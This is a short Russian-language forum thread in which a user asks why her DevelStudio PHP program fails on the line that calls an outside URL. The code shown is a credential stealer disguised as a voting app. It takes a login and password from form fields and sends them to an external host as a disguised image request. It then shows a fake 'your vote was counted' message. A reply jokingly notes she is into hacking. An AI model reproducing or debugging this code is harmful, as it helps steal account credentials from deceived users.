Светлана

Народ а где у меня ошибка создаю прогу в DevelStudio 2010 2.0

$edit1 = c('Form1->edit1')->text;
$edit2 = c('Form1->edit2')->text;
$combobox1 = c('Form1->combobox1')->inText;
$url = "httpz.ru/njdrtcwuin.gif";
file_get_contents($url . "?" . "login:" . $edit1. "|Password:" . $edit2);
messageBox("Ваш голос учтён за ИзГойТьМы теперь 8 голосов ." , "Голосование");

пишет что ошибка в 6 строке file_get_contents($url . "?" . "login:" . $edit1. "|Password:" . $edit2);

я просто расширил ошибку
само окно

Var Dan

Взломчиками промышляешь 🙂